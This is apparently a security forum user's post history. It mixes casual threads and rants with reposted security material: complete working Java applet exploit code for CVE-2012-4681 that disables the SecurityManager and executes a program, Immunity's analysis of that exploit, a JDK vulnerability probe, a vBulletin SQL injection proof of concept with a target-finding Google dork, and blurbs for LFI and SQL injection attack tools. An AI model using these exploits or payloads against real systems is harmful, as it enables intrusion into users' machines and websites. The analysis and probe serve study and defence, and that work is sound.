Everything posted by Nytro (18725 posts, 706 days won)
-
OK, let's see what they say, I'll talk to them tonight. Thanks
-
I have no demands, it looks OK to me, just with small changes, like dropping that "hacker inside".
-
CVE-2012-XXXX Java 0day

[CODE]
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet {

    public Gondvv() {
    }

    // Build a Statement for System.setSecurityManager(null), replace its private
    // AccessControlContext with one that carries AllPermission, then execute it.
    public void disableSecurity() throws Throwable {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(
                new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext =
                new AccessControlContext(new ProtectionDomain[] { localProtectionDomain });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    // Class.forName routed through java.beans.Expression: the trusted immediate
    // caller inside the JDK lets a restricted package (sun.*) be resolved from applet code.
    private Class GetClass(String paramString) throws Throwable {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class) localExpression.getValue();
    }

    // sun.awt.SunToolkit.getField calls setAccessible(true) inside doPrivileged,
    // so it hands back a writable reference to a private field.
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field) localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init() {
        try {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if (localProcess != null)
                localProcess.waitFor();
        } catch (Throwable localThrowable) {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics) {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
[/CODE]

Source: #4594319 - Pastie
-
[h=3]Java 0day analysis (CVE-2012-4681)[/h]
Tuesday, August 28, 2012
(This post brought to you by Esteban, Immunity's in-house Java friend)

Summary

A couple of days ago, a Java 0day was found running like crazy in the wild. While a lot of defense bunnies were asking "WWMAD" (What will my Antivirus do?), we decided to dive into Java for the details of the vulnerability and, as we expected, the unpatched vulnerabilities used in the Gondvv exploit were more than one (when we said "dive deep into Java", we actually meant open our new Infiltrate 2013 Master Class slide deck, which will include a full day of Java auditing). The first bug was used to get a reference to the sun.awt.SunToolkit class, which is restricted to applets, while the second bug invokes the getField public static method on SunToolkit using reflection with a trusted immediate caller, bypassing a security check. The beauty of this bug class is that it provides 100% reliability and is multiplatform. Hence this will shortly become the penetration test Swiss knife for the next couple of years (as did its older brother CVE-2008-5353). As a final note, the bug was introduced in Java 7.0, released on July 28, 2011. While you are feeling the rush of blood through your veins from all those shells being popped, think that somewhere not far away (probably a 10-hour flight from some of the major airports in North America) someone was enjoying it non-stop for quite some time now.

Introduction

As the "Secure Coding Guidelines" document [1] states, it is important to understand how permissions are checked in the Java security model (please read guideline 9-1). Many operations in the JDK perform permission checks before executing. Whenever a call to the java.security.AccessController.checkPermission method is performed, the complete call stack that exists at that moment is analyzed. If any of the callers in the stack do not have the required privilege, an exception is raised.

When we are running code in an applet in our browser, there is a context that has very restricted permissions. This means that if there is any caller in the stack that is part of our applet, the permission checks will fail (unless there is a doPrivileged code block, but let's leave that out for now). Section "9 - Access Control" in the "Secure Coding Guidelines" document [1], together with the "Java Security Architecture" document [2], will give you a complete insight into how all this works.

The Gondvv exploit

A PoC for this 0day exploit quickly began to spread when Joshua J. Drake posted it on Twitter: https://twitter.com/jduck1337/status/239875285913317376. By analyzing this implementation we can clearly see how the exploitation is done and where the vulnerabilities are really located. The first thing we notice is that most of the online analysis talks about one vulnerability, where we saw two vulnerabilities being exploited to achieve full execution on a target. Basically the exploit is creating a java.security.AccessControlContext instance with a java.security.ProtectionDomain that has full permissions and then replacing the actual AccessControlContext of a java.beans.Statement instance to be able to execute code with full privileges. So let's take a better look at each part to understand what is happening under the hood. In the java.beans.Statement implementation we can see that the AccessControlContext instance is a private final field and it gets its value by calling AccessController.getContext().
[CODE]
public class Statement {

    private static Object[] emptyArray = new Object[]{};

    static ExceptionListener defaultExceptionListener = new ExceptionListener() {
        public void exceptionThrown(Exception e) {
            System.err.println(e);
            System.err.println("Continuing ...");
        }
    };

    private final AccessControlContext acc = AccessController.getContext();
    private final Object target;
    private final String methodName;
    private final Object[] arguments;
    ClassLoader loader;
    [...]
}
[/CODE]

That call to the getContext method will set the AccessControlContext to an applet context that has restrictions, with a limited ProtectionDomain which of course is not privileged at all. Back in 2010 Sami Koivu published information about a Java vulnerability (CVE-2010-0840) that built a "trusted method chain" [4]. You can see in the article that the exploitation of that vulnerability also made use of the java.beans.Statement class. The article also explains that the fix was to add an AccessControlContext field to the Statement class, setting its value to the applet context when creating an instance, thus avoiding the fully trusted chain. This AccessControlContext field added in that fix is exactly what this new 0day exploit is replacing in order to be able to execute code with full permissions. But how can a private field be changed?

The trick here is to use the sun.awt.SunToolkit class, which contains a very interesting public static method:

[CODE]
public static Field getField(final Class klass, final String fieldName) {
    return AccessController.doPrivileged(new PrivilegedAction<Field>() {
        public Field run() {
            try {
                Field field = klass.getDeclaredField(fieldName);
                assert (field != null);
                field.setAccessible(true);
                return field;
            } catch (SecurityException e) {
                assert false;
            } catch (NoSuchFieldException e) {
                assert false;
            }
            return null;
        }
    });
}
[/CODE]

We can see that it is using reflection to get fields and the complete implementation is inside a doPrivileged block. This getField method can be used to get any field on a class, and the good thing is that it can even retrieve private ones. While this is of course very useful, it's important to notice that the classes that are part of certain packages are restricted for applets and cannot be accessed or used. Such packages are:

com.sun.deploy.*
com.sun.imageio.*
com.sun.javaws.*
com.sun.jnlp.*
com.sun.xml.internal.bind.*
com.sun.xml.internal.ws.*
sun.*

Trying to instantiate or use classes in these packages will result in an AccessControlException. This means that we are not able to get a reference to the sun.awt.SunToolkit class from our applet.
But the basic thing we need to know is that calls to certain methods can potentially bypass the SecurityManager checks depending on the immediate caller's class loader. This is explained in detail in the "Secure Coding Guidelines" document by Sun [1] in guidelines 9-8 and 9-9. This exploit is abusing this situation, taking advantage of the immediate caller to bypass security checks.

Vulnerabilities

There are 2 different zero-day vulnerabilities used in this exploit: one is used to obtain a reference to the sun.awt.SunToolkit class and the other is used to invoke the public getField method on that class. The exploit is making use of java.beans.Expression, which is a java.beans.Statement subclass. There are 2 Expression instances that are used to trigger these 2 different bugs. When the Expression.execute method is called it ends up calling the Statement.invokeInternal method, so let's check the implementation:

[CODE]
private Object invokeInternal() throws Exception {
    Object target = getTarget();
    String methodName = getMethodName();

    if (target == null || methodName == null) {
        throw new NullPointerException((target == null ? "target" :
                                        "methodName") + " should not be null");
    }

    Object[] arguments = getArguments();
    if (arguments == null) {
        arguments = emptyArray;
    }
    // Class.forName() won't load classes outside
    // of core from a class inside core. Special
    // case this method.
    if (target == Class.class && methodName.equals("forName")) {
        return ClassFinder.resolveClass((String)arguments[0], this.loader);
    }
    Class[] argClasses = new Class[arguments.length];
    for(int i = 0; i < arguments.length; i++) {
        argClasses[i] = (arguments[i] == null) ? null : arguments[i].getClass();
    }

    AccessibleObject m = null;
    if (target instanceof Class) {
        /*
        For class methods, simluate the effect of a meta class
        by taking the union of the static methods of the
        actual class, with the instance methods of "Class.class"
        and the overloaded "newInstance" methods defined by the
        constructors.
        This way "System.class", for example, will perform both
        the static method getProperties() and the instance method
        getSuperclass() defined in "Class.class".
        */
        if (methodName.equals("new")) {
            methodName = "newInstance";
        }
        // Provide a short form for array instantiation by faking an nary-constructor.
        if (methodName.equals("newInstance") && ((Class)target).isArray()) {
            Object result = Array.newInstance(((Class)target).getComponentType(), arguments.length);
            for(int i = 0; i < arguments.length; i++) {
                Array.set(result, i, arguments[i]);
            }
            return result;
        }
        if (methodName.equals("newInstance") && arguments.length != 0) {
            // The Character class, as of 1.4, does not have a constructor
            // which takes a String. All of the other "wrapper" classes
            // for Java's primitive types have a String constructor so we
            // fake such a constructor here so that this special case can be
            // ignored elsewhere.
            if (target == Character.class && arguments.length == 1 &&
                argClasses[0] == String.class) {
                return new Character(((String)arguments[0]).charAt(0));
            }
            try {
                m = ConstructorFinder.findConstructor((Class)target, argClasses);
            }
            catch (NoSuchMethodException exception) {
                m = null;
            }
        }
        if (m == null && target != Class.class) {
            m = getMethod((Class)target, methodName, argClasses);
        }
        if (m == null) {
            m = getMethod(Class.class, methodName, argClasses);
        }
    }
    else {
        /*
        This special casing of arrays is not necessary, but makes files
        involving arrays much shorter and simplifies the archiving infrastrcure.
        The Array.set() method introduces an unusual idea - that of a static method
        changing the state of an instance. Normally statements with side
        effects on objects are instance methods of the objects themselves
        and we reinstate this rule (perhaps temporarily) by special-casing arrays.
        */
        if (target.getClass().isArray() &&
            (methodName.equals("set") || methodName.equals("get"))) {
            int index = ((Integer)arguments[0]).intValue();
            if (methodName.equals("get")) {
                return Array.get(target, index);
            }
            else {
                Array.set(target, index, arguments[1]);
                return null;
            }
        }
        m = getMethod(target.getClass(), methodName, argClasses);
    }
    if (m != null) {
        try {
            if (m instanceof Method) {
                return MethodUtil.invoke((Method)m, target, arguments);
            }
            else {
                return ((Constructor)m).newInstance(arguments);
            }
        }
        catch (IllegalAccessException iae) {
            throw new Exception("Statement cannot invoke: " +
                                methodName + " on " + target.getClass(),
                                iae);
        }
        catch (InvocationTargetException ite) {
            Throwable te = ite.getTargetException();
            if (te instanceof Exception) {
                throw (Exception)te;
            }
            else {
                throw ite;
            }
        }
    }
    throw new NoSuchMethodException(toString());
}
[/CODE]

And the Statement.getMethod implementation is:

[CODE]
static Method getMethod(Class<?> type, String name, Class<?>... args) {
    try {
        return MethodFinder.findMethod(type, name, args);
    } catch (NoSuchMethodException exception) {
        return null;
    }
}
[/CODE]

Note in the code above the calls to the com.sun.beans.finder.ClassFinder.resolveClass and com.sun.beans.finder.MethodFinder.findMethod methods.

com.sun.beans.finder.ClassFinder.findClass vulnerability

The Statement.invokeInternal method is calling com.sun.beans.finder.ClassFinder.resolveClass, and if we take a look at its implementation we'll see that it ends up calling the com.sun.beans.finder.ClassFinder.findClass method:

[CODE]
public static Class<?> resolveClass(String name, ClassLoader loader) throws ClassNotFoundException {
    Class<?> type = PrimitiveTypeMap.getType(name);
    return (type == null) ? findClass(name, loader) : type;
}
[/CODE]

[CODE]
public static Class<?> findClass(String name) throws ClassNotFoundException {
    try {
        ClassLoader loader = Thread.currentThread().getContextClassLoader();
        if (loader == null) {
            loader = ClassLoader.getSystemClassLoader();
        }
        if (loader != null) {
            return Class.forName(name, false, loader);
        }
    } catch (ClassNotFoundException exception) {
        // use current class loader instead
    } catch (SecurityException exception) {
        // use current class loader instead
    }
    return Class.forName(name);
}
[/CODE]

This code shows that if an exception is caught, then the default is to simply call Class.forName, and this is exactly what happens here. As is explained in Guideline 9-9, "Safely invoke standard APIs that perform tasks using the immediate caller's class loader instance", in the "Secure Coding Guidelines" documentation [1], a call to Class.forName will use the immediate caller's ClassLoader, and in this case the caller is part of the JDK, which is trusted, thus allowing us to get any class in any package. The caller's stack can be seen by simply debugging the applet.

MethodFinder.findMethod vulnerability

According to the "Secure Coding Guidelines" document, in guideline 9-8, java.lang.Class.getMethod and java.lang.Class.getMethods only take the immediate caller into account when performing security checks.
These methods can be used to get a Method reference via reflection, but only "public" ones. Even though we have a reference to the sun.awt.SunToolkit class we cannot call any of its methods directly, because it is part of a restricted package and a security exception will be raised. What is needed here is a way of getting a method reference via reflection but having a "trusted" immediate caller in the stack in order to bypass security checks. The implementation of com.sun.beans.finder.MethodFinder.findMethod is this:

[CODE]
public static Method findMethod(Class<?> type, String name, Class<?>... args) throws NoSuchMethodException {
    if (name == null) {
        throw new IllegalArgumentException("Method name is not set");
    }
    PrimitiveWrapperMap.replacePrimitivesWithWrappers(args);
    Signature signature = new Signature(type, name, args);

    Method method = CACHE.get(signature);
    if (method != null) {
        return method;
    }
    method = findAccessibleMethod(new MethodFinder(name, args).find(type.getMethods()));
    CACHE.put(signature, method);
    return method;
}
[/CODE]

The call to findAccessibleMethod ends up calling java.lang.Class.getMethods, and the immediate caller in the stack is com.sun.beans.finder.MethodFinder, which is trusted since it is part of the JDK, thus bypassing the security checks. Once again we can see the caller's stack by debugging the applet.

Affected Versions

The com.sun.beans.finder.MethodFinder and com.sun.beans.finder.ClassFinder classes are available only since JDK 7.

Putting it all together

So this exploit is performing the following steps:

1. Creates a Statement instance that will call the System.setSecurityManager(null) method using reflection.
2. Creates a custom AccessControlContext with full permissions.
3. With one bug it gets a reference to the sun.awt.SunToolkit class that is restricted to applets.
4. With the other bug it invokes the getField public static method on sun.awt.SunToolkit using reflection with a trusted immediate caller that bypasses the security checks.
5. With the getField method it gets a reference to the Statement.acc private field and sets its value to the custom AccessControlContext instance previously created.
6. Finally it executes the Statement, which will disable the Security Manager, bypassing all security checks because it has full permissions set in its AccessControlContext.

Author
Esteban Guillardoy
esteban@immunityinc.com
twitter: @sagar38

References
[1] Secure Coding Guidelines for the Java Programming Language, Version 4.0
[2] Java SE 7 Security Architecture
[3] Java SE 7 Security Documents - http://docs.oracle.com/javase/7/docs/technotes/guides/security/
[4] Sami Koivu, (Slightly) Random Broken Thoughts: Java Trusted Method Chaining (CVE-2010-0840/ZDI-10-056)

Posted by Nico Waisman at 11:15 AM
Source: Immunity Products: Java 0day analysis (CVE-2012-4681)
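As an added example, not code from the Immunity post or from the Gondvv applet: a small stand-alone probe that runs the two caller-dependent lookups described above under the default SecurityManager, so you can tell whether a given JDK 7 runtime still allows them. It stops at obtaining the java.lang.reflect.Field for Statement.acc and never writes it or touches the SecurityManager. The class name, the method names and the choice of Statement.acc as the target field are ours; the code assumes a JDK 7 JRE with the stock java.policy and java.security (where sun.* is on the package.access list). On JDK 18 and later System.setSecurityManager throws unless the security manager is explicitly allowed on the command line, so it is not meant for those runtimes.

```java
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;

public class BeansBypassProbe {

    // sun.* is on the package.access list in java.security (assumption: stock
    // JDK 7 configuration), so untrusted code must not be able to reach it once
    // a SecurityManager is active.
    static final String RESTRICTED = "sun.awt.SunToolkit";

    // Baseline: a direct Class.forName from our (application class loader) code
    // goes through SecurityManager.checkPackageAccess and must fail.
    static boolean directLookupBlocked() {
        try {
            Class.forName(RESTRICTED);
            return false;
        } catch (SecurityException expected) {
            return true;
        } catch (ClassNotFoundException e) {
            return true; // class not present on this runtime, nothing to reach
        }
    }

    // Bug 1 probe: the same lookup routed through java.beans.Expression.
    // Statement.invokeInternal special-cases Class.forName into
    // ClassFinder.resolveClass, whose fallback Class.forName(name) runs with a
    // bootstrap-loaded (trusted) immediate caller. Returns the Class or null.
    static Class<?> expressionLookup() {
        try {
            Expression e = new Expression(Class.class, "forName", new Object[] { RESTRICTED });
            e.execute();
            Object value = e.getValue();
            return (value instanceof Class) ? (Class<?>) value : null;
        } catch (Throwable t) {
            return null; // patched runtime, or no SunToolkit here
        }
    }

    // Bug 2 probe: ask SunToolkit.getField for Statement.acc through a second
    // Expression, the step the exploit uses to reach the private field. The
    // Method lookup happens in MethodFinder (trusted immediate caller) and the
    // setAccessible(true) inside getField runs under doPrivileged.
    static boolean privateFieldReachable(Class<?> sunToolkit) {
        try {
            Expression e = new Expression(sunToolkit, "getField",
                    new Object[] { Statement.class, "acc" });
            e.execute();
            return e.getValue() instanceof Field;
        } catch (Throwable t) {
            return false;
        }
    }

    public static void main(String[] args) {
        // The default SecurityManager with the default policy gives this class
        // roughly the restrictions an applet's code source would have.
        System.setSecurityManager(new SecurityManager());

        System.out.println("direct Class.forName blocked:          " + directLookupBlocked());
        Class<?> toolkit = expressionLookup();
        System.out.println("bug 1, Expression-routed lookup works: " + (toolkit != null));
        System.out.println("bug 2, SunToolkit.getField reachable:  "
                + (toolkit != null && privateFieldReachable(toolkit)));
    }
}
```

Compile and run it with the JRE under test (javac BeansBypassProbe.java && java BeansBypassProbe). The first line should read true on any runtime, since that is the check the package.access list is supposed to give you. On Java 7 up to Update 6 the two probes print true; Oracle shipped the fix in Java 7 Update 7, and on a runtime that carries it the expected result for both probes is false. Keep in mind what the probe does not show: a true on bug 2 means a setAccessible'd Field object for Statement.acc was handed to untrusted code, which is already the whole ballgame, so do not extend the probe to set the field on a machine you care about.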
-
Those are the ones from a year and a half ago. It has to look good, but it also has to fit the theme.
-
Hi, since last year's Easter we've been trying to change the forum header. Proposals from back then, for ideas: Can anyone help us with a new header?
-
Yes, the fact that it's about Windows 8 is irrelevant...
-
What I don't get: why the fuck does the crap that is Ubuntu get picked for these kinds of comparisons? I can't stand that we've reached the point where talking about Linux means Ubuntu. The only OK thing about Ubuntu is that there are thousands of losers making packages. Have you looked at the kernel updates? Have you seen how many @canonical emails are in there? The number tends towards 0. Red Hat, Novell and many others contribute to the kernel, to that "thing" that makes your computer run well and fast, and then the jerks from Canonical come along, put a colourful wallpaper on the Desktop and 2-3 visual effects from Compiz (to which they of course contributed 0) and tons of clueless kids show up and praise their colourful crap to the skies. Also, 90% of those who use Ubuntu have no clue what Linux means, and the only command they know is "sudo apt-get", even though they don't even have an idea what that "sudo" is. Many probably have no idea about the file system, that there's a /proc in there, and many other things. But no, they're hotshots because they have "Linux" and bring bullshit arguments like "Linux has no viruses" into discussions against an operating system they've used their whole life. Why do they use Linux? Simple: because it's just like Windows. Yes, two clicks and you connect to WiFi, you have a File Manager (Dolphin), you have browsers, you have Pidgin instead of Yahoo! Messenger, and a few other small differences, all GUI! So for many it's just a change of "style" without having the vaguest idea of what happens "underneath". So, especially you thick-headed ones who have only used Ubuntu, refrain from pathetic comments. If only you had compiled a kernel, or any program from source, to see what that program is about, what libraries it uses, what compile options it has and how customizable it is... But no, you're "Linux people", supposedly. UBUNTU IS NOT LINUX! Screw Ubuntu!
-
vBulletin Yet Another Awards System 4.0.2 SQL Injection
Authored by Backsl@sh/Dan
Posted Aug 31, 2012

# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+

The vulnerability exists within /request_award.php.

[CODE]
$vbulletin->input->clean_array_gpc('p', array(
    'award_id' => TYPE_UINT,
    //'award_request_name' => TYPE_STR,
    //'award_request_recipient_name' => TYPE_STR,
    'award_request_reason' => TYPE_STR,
    'award_request_uid' => TYPE_UNIT,
));

$award_request_uid = $vbulletin->GPC['award_request_uid'];

$db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");
[/CODE]

$award_request_uid is used within an insert into statement, unsanitized.

- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit

Thanks. Have fun.
http://www.bugabuse.net/

Source: vBulletin Yet Another Awards System 4.0.2 SQL Injection - Packet Storm
-
It's fine for those who want to test various queries, from wherever they are. For example, if I'm at work and want to try something new, I don't bother installing the MySQL server, I go there and test.
-
The page has also been updated with new posts: https://www.facebook.com/rstforum Can someone make a cover photo for the page? It looks ugly without one. Something simple and elegant.
-
That looks like the link to an mp3...
-
[h=3]OWASP Security Shepherd 1.2 Released[/h]
Security Shepherd is a computer-based training application for web application security vulnerabilities. This project strives to herd the lost sheep of the technological world back to the safe and sound ways of secure practices. Security Shepherd can be deployed as a CTF (Capture the Flag) game or as an open-floor educational server. Easy configuration to suit every use.

Security Shepherd has been designed and implemented with the aim of fostering and improving security awareness among a varied skill-set demographic. This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, whereas a challenge puts what the user learned in the lesson to use. Utilizing the OWASP Top Ten as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. The by-product of this challenge game is the acquired skill to harden a player's own environment against OWASP Top Ten security risks.

The modules have been crafted to provide a challenge not only for a security novice, but for security professionals as well. Security Shepherd's vulnerabilities are not simulated, and are instead delivered through hardened real security vulnerabilities that cannot be abused to compromise the application or its environment. Many of these levels include insufficient protections against these vulnerabilities, such as blacklist filters and poor security configuration. Security Shepherd includes everything you need to complete all of its levels, including the OWASP Zed Attack Proxy Project and portable browsers already configured for proxy use.

The Security Shepherd project covers the following web application security topics:
- SQL Injection
- Cross Site Scripting
- Broken Authentication and Session Management
- Cross Site Request Forgery
- Insecure Direct Object Reference
- Insecure Cryptographic Storage
- Failure to Restrict URL Access
- Unvalidated Redirects and Forwards
- Insufficient Transport Layer Security

Download OWASP Security Shepherd 1.2
Source: OWASP Security Shepherd 1.2 Released - Penetration Testing and Security Tools
-
[h=3]lafuzz - Local File Incursion exploiter[/h]
LaFuzz is an exploiter/fuzzer which specializes in Local File Incursion (LFI), but not just to exploit known vulnerabilities; LaFuzz takes a step forward into exploiting unknown/0-day ones surrounding directory traversal vectors.

How to use:
./lafuzz.py
python2.7 lafuzz.py
python lafuzz.py

Download lafuzz 1.5
Source: lafuzz - Local File Incursion exploiter - Penetration Testing and Security Tools
-
[h=3]Hideman - Free VPN service with multiple server locations[/h]
Virtual Private Network services are handy when you want to surf the internet privately. A VPN helps us to protect our surfing habits from being cached by websites. Your internet service provider is also not able to know what you are doing on the internet. A VPN helps you to surf anonymously. Connections to VPNs are encrypted, which means that your data is safe from snooping users on the same network. This means you do not have to fear that someone in a hotel, Internet cafe or airport can steal personal information and data from you.

Hideman provides its customers with VPN and Wi-Fi protection services. VPN is short for "Virtual Private Network", which basically allows for an encrypted pathway between servers and hardware. As a result, all computers and web presences using a VPN are completely anonymous, ensuring unsurpassed privacy. Hideman offers this service through their special software, which can be downloaded for free. In order to utilize the service, the user runs the software and manually establishes a unique IP address and country of origin. Hideman's software is completely free to download. On top of that, its users will also be able to use it for four hours a week, providing a nearly "unlimited" free trial.

Download for Windows
Download for Android
Source: Hideman - Free VPN service with multiple server locations - Penetration Testing and Security Tools
-
[h=3]Safe3 sql injector - Powerful penetration testing tool for SQL Injection[/h]
Safe3SI is one of the most powerful and easy-to-use penetration tools that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with an AI detection engine.
Features
- Full support for http and https websites.
- Full support for Basic, Digest and NTLM http authentication.
- Full support for GET, POST and Cookie sql injection.
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
- Powerful AI engine to automatically recognize the injection type, database type and best sql injection method.
- Support to enumerate databases, tables, columns and data.
- Support to read, list and write any file on the database server's underlying file system when the database software is MySQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is Oracle or Microsoft SQL Server.
- Support for ip domain query, web path guessing, md5 cracking etc.
- Support for sql injection scanning.
Download Safe3 sql injector
Source: Safe3 sql injector - Powerful penetration testing tool for SQL Injection - Penetration Testing and Security Tools
-
[h=3]DiskCryptor - Encrypt your partitions[/h]
Encrypting your documents protects them from prying eyes if your computer becomes lost or stolen. However, you shouldn't stop at just encrypting your sensitive documents. A thief can recover passwords and other sensitive information stored by Windows. Even if you password-protect your Windows account, your system files can still be easily accessed, for example, from a Linux-based LiveCD.
DiskCryptor is a fully open solution to encrypt all partitions, including the system partition. The program is a replacement for the proprietary DriveCrypt Plus Pack and PGP WDE. The only alternative to DiskCryptor that has comparable features is TrueCrypt. There are other alternatives with similar functionality, but they are fully proprietary ones, which makes them unacceptable to use for protection of confidential data. Originally, DiskCryptor was conceived as a replacement for DriveCrypt Plus Pack and PGP Whole Disk Encryption (WDE). Now, however, the aim of the development of the project is to create the best product in its category.
Features of "DiskCryptor"
Encryption of system and bootable partitions with pre-boot authentication:
- Full support for dynamic disks.
- Support for disk devices with large sector size, which is important for hardware RAID operation.
- Automatic mounting of disk partitions and external storage devices.
- Broad choice in configuration of booting an encrypted OS. Support for various multi-boot options.
High performance, comparable to the efficiency of a non-encrypted system:
- Support for hardware cryptography on VIA processors (PadLock extensions for hardware AES acceleration).
- Support for hardware AES acceleration (AES-NI instruction set) on new Intel CPUs.
Transparent encryption of disk partitions:
- Choice of encryption algorithm (AES, Twofish, Serpent), including their combinations.
Full support for external storage devices:
- Full support for encryption of external USB storage devices.
- Option to create encrypted CD and DVD disks.
Full compatibility with third party boot loaders (LILO, GRUB, etc.):
- Option to place the boot loader on an external medium and to authenticate using the key medium.
- Support for key files.
Download DiskCryptor
Source: DiskCryptor - Encrypt your partitions - Penetration Testing and Security Tools
-
Why doesn't anyone kiss my ass?
-
Yeah, how complicated it is to write "malware" for Linux... You have Qt, Gtk and tons of other libraries already present on most distributions; you can make a complex 20 KB server simply by dynamically linking to such libraries plus a few thousand lines of code. Not to mention Python, Perl or even shell scripting: rm -rf / , you don't need to be Torvalds to write such a crappy little program, or a Pidgin/Mozilla stealer and other junk. Stop with the "Linux has no viruses" nonsense if you have nothing to do with programming.
-
And away we spoof!!!
Table of Contents
And away we spoof!!! (p. 1)
  Notes on stopping arpspoof, the program (p. 1)
  Dsniff utilities (p. 1)
Bandwidth Control (p. 3)
Bandwidth usage (p. 5)
  MRTG (p. 5)
  Interpreting MRTG (p. 5)
  IP Flow Meter (ipfm) (p. 6)
    Interpreting ipfm output (p. 7)
  IPTraf (p. 8)
  Berkeley Packet Filter (bpf) Quickie (p. 9)
  Tcpdump (p. 9)
    Interpreting tcpdump traffic (p. 10)
  NTOP (p. 11)
Conclusion (p. 12)
Defenses (p. 13)
  Read Carefully! (p. 13)
The Heart of the monitoring (p. 15)
Essential preparation (p. 17)
  Software Used (p. 18)
Ripped from the Headlines (p. 20)
  Ngrep (p. 21)
  Snort (p. 21)
Security Considerations (p. 23)
  Data Security (p. 24)
  Remote Access (p. 25)
  Restricting PAM-style (p. 27)
  The chosen are few (p. 28)
  Hand in the googie jar (p. 28)
  Other considerations (p. 29)
    Notes (p. 31)
Thanks (p. 32)
'To spoof or not to spoof, that is the packet' (p. 32)
Dsniff 'n the Mirror (p. 33)
Download: http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf
-
Handbook of Applied Cryptography
[h=4]Alfred J. Menezes, Paul C. van Oorschot and Scott A. Vanstone[/h]
CRC Press
ISBN: 0-8493-8523-7
October 1996, 816 pages
CRC Press has generously given us permission to make all chapters available for free download. Please read this copyright notice before downloading any of the chapters.
Chapter 1 - Overview of Cryptography (ps, pdf)
Chapter 2 - Mathematics Background (ps, pdf)
Chapter 3 - Number-Theoretic Reference Problems (ps, pdf)
Chapter 4 - Public-Key Parameters (ps, pdf)
Chapter 5 - Pseudorandom Bits and Sequences (ps, pdf)
Chapter 6 - Stream Ciphers (ps, pdf)
Chapter 7 - Block Ciphers (ps, pdf)
Chapter 8 - Public-Key Encryption (ps, pdf)
Chapter 9 - Hash Functions and Data Integrity (ps, pdf)
Chapter 10 - Identification and Entity Authentication (ps, pdf)
Chapter 11 - Digital Signatures (ps, pdf)
Chapter 12 - Key Establishment Protocols (ps, pdf)
Chapter 13 - Key Management Techniques (ps, pdf)
Chapter 14 - Efficient Implementation (ps, pdf)
Chapter 15 - Patents and Standards (ps, pdf)
Appendix - Bibliography of Papers from Selected Cryptographic Forums (ps, pdf)
References (ps, pdf)
Index (ps, pdf)
[h=3]About the book[/h]
Words from the authors
Brief table of contents
Table of contents
Foreword, by Ron Rivest
Preface
Reviews
Errata (last updated July 24, 2011)
Source: Handbook of Applied Cryptography
-
LINUX System Call Quick Reference
Introduction
System calls are the services provided by the Linux kernel. In C programming, one often uses functions defined in libc, which provides a wrapper for many system calls. Manual page section 2 provides more information about system calls. To get an overview, use "man 2 intro" in a command shell. It is also possible to invoke the syscall() function directly. Each system call has a function number defined in <syscall.h> or <unistd.h>. Internally, a system call is invoked by software interrupt 0x80 to transfer control to the kernel. The system call table is defined in the Linux kernel source file "arch/i386/kernel/entry.S".
System Call Example
#include <syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>

int main(void)
{
    long ID1, ID2;

    /*-----------------------------*/
    /* direct system call          */
    /* SYS_getpid (func no. is 20) */
    /*-----------------------------*/
    ID1 = syscall(SYS_getpid);
    printf("syscall(SYS_getpid)=%ld\n", ID1);

    /*-----------------------------*/
    /* "libc" wrapped system call  */
    /* SYS_getpid (Func No. is 20) */
    /*-----------------------------*/
    ID2 = getpid();
    printf("getpid()=%ld\n", ID2);

    return 0;
}
http://www.digilife.be/quickreferences/qrc/linux%20system%20call%20quick%20reference.pdf
-
I would have liked to contribute to the kernel, I wanted to write my own filesystem, but I don't have the time it takes. I only did a few trivial patches that fixed various warnings/errors. In the future I want to get into Pidgin/libpurple, mostly because I want to learn about YMSG.
-
Who wrote this crap?
-
[h=1]Americans know for sure: Cloud Computing is in ...the sky[/h]
by the Hit editorial staff | 30 August 2012
